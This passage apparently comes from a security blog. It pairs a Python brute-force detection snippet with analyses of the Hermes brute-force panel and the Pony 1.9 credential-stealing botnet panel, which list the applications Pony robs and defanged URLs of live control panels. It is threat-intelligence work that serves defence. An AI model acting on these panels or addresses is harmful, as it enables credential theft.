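        if len(items) >= min_total and len(per_ip) >= min_sources:
            alerts.append({"window": b, "failures": len(items),
                           "sources": len(per_ip),
                           "users": len({u for u, _ in items}),
                           "max_per_ip": max(per_ip.values())})
    return alerts


if __name__ == "__main__":
    ev = parse_failures(SAMPLE_LOG)
    print("per-IP rule fires on:", per_ip_alerts(ev))
    print("per-target rule fires on:", distributed_alerts(ev))
```

On the sample, the per-IP rule only catches the 21:15 single-source burst, while the per-target rule catches the 18:15 window where twelve IPs each failed once.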
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The list
of passwords to be used for the brute-force attack is specified in the Panel's
configuration menu.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s1600/hermes-settings-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-v4YbTVW_KUk/UP8Gx5u05XI/AAAAAAAAAb8/grB5_Es1R1U/s320/hermes-settings-B.JPG" width="196" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">In the
Import option of the menu one selects the target machine against which the
distributed brute-force attack will be carried out, together with the name of
the file, previously uploaded to the Control Panel, containing the list of
usernames against which the username / password combinations of the
authentication attempts will be launched on that host.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">In the Hermes
Panel that was analysed it can be seen that, for testing, they used files with
the IP address ranges of active machines hosted at the US providers Dreamhost
and GoDaddy, as well as the files containing the list of users for the
attack.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s1600/hermes-import.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://2.bp.blogspot.com/-6WzEWVdP6DE/UP8G4VW2iEI/AAAAAAAAAcE/AOgX6nerG8Y/s400/hermes-import.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">These
user files contained lists of test person names.</span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s1600/hermes-users.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://2.bp.blogspot.com/-c63VSO4eSJE/UP8HAbFsnAI/AAAAAAAAAcM/EN8PcLFV-3E/s320/hermes-users.jpg" width="129" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">If we
look at the tracking panel of the tests carried out, we see that they made
thousands of requests against GoDaddy addresses to test the HERMES
Panel.<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s1600/hermes-notes-B.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/-YlnxlXZ6vCw/UP8HGaDGk3I/AAAAAAAAAcU/zmyUEwM5udE/s400/hermes-notes-B.JPG" width="218" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11pt;">Thus, on
5-12-2012 they made 513,000 brute-force authentication attempts against GoDaddy
addresses at 18:15, 410,000 brute-force authentication attempts at 21:15,
481,460 brute-force authentication attempts at 22:44, and so on.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-7800099602853103982013-01-16T08:12:00.003-08:002013-01-16T08:12:52.545-08:00BOTNET PONY 1.9 Malware<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">For the past few months a new class of malware called the PONY
botnet has been detected on the crimeware scene. The Pony control panel is
identified by the logo of this animal, the one that appears in the well-known
Facebook game "Farmville".</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The login screen panel of this new botnet Pony is:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s1600/pony-login-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s400/pony-login-B.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Once the control panel is accessed, it displays a menu
with all the available options. It can be seen that it has been developed to
capture all types of passwords and login credentials from infected users when
they access applications and Internet sites. This is a very powerful type of
spyware / keylogger with very dangerous features.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s1600/pony-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s400/pony-B.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The Pony Trojan is configured to capture all kinds of
confidential information and access passwords for the following applications:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Passwords for FTP and SSH servers. The Trojan is able
to recognise almost all FTP and SSH clients, both commercial and
open source, and extract their stored credentials:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">System Info,
FAR Manager, Total Commander, WS_FTP, CuteFTP, FlashFXP, FileZilla, FTP
commander, BulletProof FTP, SmartFTP, TurboFTP, FFFTP, CoffeeCup FTP /
Sitemapper, CoreFTP, FTP Explorer, Frigate3 FTP, SecureFX, UltraFXP,
FTPRush, WebSitePublisher, BitKinex, ExpanDrive, ClassicFTP, Fling, SoftX,
Directory Opus, FreeFTP / DirectFTP, LeapFTP, WinSCP, 32bit FTP,
NetDrive, WebDrive, FTP Control, Opera, WiseFTP, FTP Voyager, Firefox,
FireFTP, SeaMonkey, Flock, Mozilla, LeechFTP, Odin Secure FTP Expert,
WinFTP, FTP Surfer, FTPGetter, ALFTP, Internet Explorer, Dreamweaver,
DeluxeFTP, Google Chrome, Chromium / SRWare Iron, ChromePlus, Bromium
(Yandex Chrome), Nichrome, Comodo Dragon, RockMelt, K-Meleon, Epic,
Staff-FTP, AceFTP, Global Downloader, FreshFTP, BlazeFTP, NETFile, GoFTP,
3D-FTP, Easy FTP, Xftp, FTP Now, Robo-FTP, LinasFTP, Cyberduck, Putty,
Notepad++, CoffeeCup Visual Site Designer, FTPShell, FTPInfo, NexusFile,
FastStone Browser, CoolNovo, WinZip, Yandex.Internet, MyFTP, sherrod FTP,
NovaFTP, Windows Mail, Windows Live Mail, Becky!, Pocomail, IncrediMail,
The Bat!, Outlook, Thunderbird, FastTrack.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Screen of the FTP grabber management menu:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s1600/pony-ftp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s320/pony-ftp.jpg" width="320" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">It also captures all kinds of e-mail accounts and their passwords,
stored certificates and RDP passwords.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s1600/pony-other.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s400/pony-other.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The control panel allows capturing all types of passwords
used to log in to web applications over HTTP and HTTPS. It has a very powerful
filter for configuring captures: Internet domains can be selected or excluded so
that data capture starts when infected users access those pages, and selection
can also be made by text strings, domains, countries, dates, etc.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s1600/pony-http.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="383" src="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s400/pony-http.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The statistics panel shows the confidential data captured
from the web browsing of infected users.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s1600/pony-reports.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s400/pony-reports.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"></span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Users compromised by the Pony trojan are ordered by their IP address; the information gathered for each user can be viewed by selecting the desired IP profile:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s1600/pony-reports2-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s400/pony-reports2-B.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">It is very interesting to see in the statistics panel the variety of data types the trojan can capture from infected users:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s1600/pony2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s400/pony2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s1600/pony-statistics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s400/pony-statistics.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s1600/pony-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">All captured data is encrypted and stored in a MySQL database so that it cannot be stolen if someone else gains access to this information:</span>
</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<span lang="EN" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN;">Finally we present part of the file structure of the PONY trojan kit:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s1600/files-kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s400/files-kit.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";"><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Other malicious addresses hosting active Pony panels have also been found at:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://217.195.200.12:8080/ponyb/admin.php</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://195.5.208.204:8080/ponyb/admin.php</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://9jal33ts.com/ponysample/admin.php</span></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif";">hXXp://198.27.83.179/popo/</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://hostohu.net/p0x/admin.php</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">hXXp://vpro.juplo.com/p/admin.php</span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-72870291473776524382013-01-13T11:09:00.001-08:002013-01-13T12:03:16.458-08:00PONY 1.9 BOTNET
<a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Desde hace
unos pocos meses se ha detectado en el escenario del cibercrimen una nueva
clase de Bonet Malware denominada PONY y que se identifica su panel por el logo
de este animal que aparece en el famoso juego para Facebook “Farmville”</span></span><br />
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-pjMkhVqiz1U/UPMGzibcehI/AAAAAAAAAYc/pIlrdmKeKhA/s1600/pony-logo.jpg" /></a></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">La pantalla
de login al panel de este nuevo botnet Pony es la siguiente:</span></span><br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span><a href="http://www.blogger.com/blogger.g?blogID=5707299821054210891" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s1600/pony-login-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="291" src="http://4.bp.blogspot.com/-5VOka5kVYjo/UPMITeUATQI/AAAAAAAAAY4/yWDsh1sZLfI/s400/pony-login-B.jpg" width="400" /></a></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Una vez que
se ha accedido a este Panel de Control aparece el menú con todas las opciones
disponibles observándose que ha sido diseñado para capturar todo tipo de credenciales
de acceso de las aplicaciones de los usuarios infectados así como de los sitios
de Internet a los que accede. </span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Se trata de un potente Malware del tipo Spy –
Keylogger con funcionalidades muy peligrosas.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s1600/pony-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="http://2.bp.blogspot.com/-aT1hHqvjke4/UPMN_FVIaHI/AAAAAAAAAZU/FrolNuSjymU/s640/pony-B.jpg" width="640" /></a></div>
<br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">El troyano
Pony está configurado para capturar toda clase de información confidencial y
datos de acceso para las siguientes aplicaciones:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Contraseñas
de acceso para servidores FTP y SSH. El troyano es capaz de reconocer casi todas
las aplicaciones FTP, SSH existentes en el mercado y extraer sus credenciales:</span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">System
Info , FAR Manager , Total Commander , WS_FTP , CuteFTP , FlashFXP , FileZilla
, FTP commander , BulletProof FTP , SmartFTP , TurboFTP , FFFTP , CoffeeCup FTP
/ Sitemapper , CoreFTP , FTP Explorer , Frigate3 FTP , SecureFX , UltraFXP ,
FTPRush , WebSitePublisher , BitKinex , ExpanDrive , ClassicFTP , Fling , SoftX
, Directory Opus , FreeFTP / DirectFTP , LeapFTP , WinSCP , 32bit FTP ,
NetDrive , WebDrive , FTP Control , Opera , WiseFTP , FTP Voyager , Firefox ,
FireFTP , SeaMonkey , Flock , Mozilla , LeechFTP , Odin Secure FTP Expert ,
WinFTP , FTP Surfer , FTPGetter , ALFTP , Internet Explorer , Dreamweaver ,
DeluxeFTP , Google Chrome , Chromium / SRWare Iron , ChromePlus , Bromium
(Yandex Chrome) , Nichrome , Comodo Dragon , RockMelt , K-Meleon , Epic ,
Staff-FTP , AceFTP , Global Downloader , FreshFTP , BlazeFTP , NETFile , GoFTP
, 3D-FTP , Easy FTP , Xftp , FTP Now , Robo-FTP , LinasFTP , Cyberduck , Putty
, Notepad++ , CoffeeCup Visual Site Designer , FTPShell , FTPInfo , NexusFile ,
FastStone Browser , CoolNovo , WinZip , Yandex.Internet , MyFTP , sherrod FTP ,
NovaFTP , Windows Mail , Windows Live Mail , Becky! , Pocomail , IncrediMail ,
The Bat! , Outlook , Thunderbird , FastTrack .</span></span></div>
<div class="MsoNormal">
<br />
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">La pantalla
del menú de gestión del capturador FTP:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s1600/pony-ftp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wr5ASROxdAM/UPMONg0DRnI/AAAAAAAAAZc/2w6EgNEkZks/s1600/pony-ftp.jpg" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">También captura
cualquier tipo de direcciones de e-mails , así como sus contraseñas de acceso ,
certificados que tenga almacenados el usuario , además de contraseñas de acceso
RDP</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s1600/pony-other.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="http://4.bp.blogspot.com/-VQpltCMEr_g/UPMOZhrswtI/AAAAAAAAAZk/6kOx5rIO2wg/s640/pony-other.jpg" width="640" /></a></div>
</div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">El panel
permite la captura de todo tipo de contraseñas de acceso a aplicaciones web
bajo HTTP y HTTPS. Dispone de un filtro muy potente para configurar las
capturas , seleccionando o excluyendo los dominios de Internet a los que el
usuario infectado acceda para empezar a capturar datos cuando se encuentre en
dichas páginas , así como cadenas de texto de captura , países de los dominios víctimas
, fechas , etc.</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s1600/pony-http.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="307" src="http://1.bp.blogspot.com/-9WO8ktvqV0w/UPMRPBHRYkI/AAAAAAAAAa8/XxqCU6_PyHU/s320/pony-http.jpg" width="320" /></a></div>
<span style="font-family: Arial;"></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">El panel de
seguimiento de los datos confidenciales capturados de la navegación Web de los
usuarios infectados.</span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s1600/pony-reports.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="http://1.bp.blogspot.com/-dKUMv5cB-ew/UPMPV8WnhDI/AAAAAAAAAZ4/p_DcOyi1n5I/s400/pony-reports.jpg" width="400" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br />
<span style="font-family: Arial;"></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Los usuarios
comprometidos por el troyano Pony están ordenados por su IP , pudiéndose seleccionar
la información recopilada para cada usuario seleccionando el perfil de la IP
deseada:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s1600/pony-reports2-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="http://1.bp.blogspot.com/-oWPobkoCT-g/UPMPSv0VVWI/AAAAAAAAAZw/Zfinbb24M9g/s400/pony-reports2-B.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Es muy
interesante observar en el panel estadístico la cantidad de información que
puede capturar de los usuarios infectados por el troyano:</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s1600/pony2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="http://4.bp.blogspot.com/-JVx1MCOvQKI/UPMSoJsFLbI/AAAAAAAAAbY/jT7EWfEX1C8/s400/pony2.jpg" width="400" /></a></div>
</div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s1600/pony-statistics.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="377" src="http://2.bp.blogspot.com/-ifajUK4q-z4/UPMPcpmwWrI/AAAAAAAAAaY/_u6YjWFcWSA/s400/pony-statistics.jpg" width="400" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Todos los
datos capturados son cifrados y almacenados en una base de datos en MySQL para
evitar que sean robados si alguien logra acceder acceder a dicha información:</span></span></div>
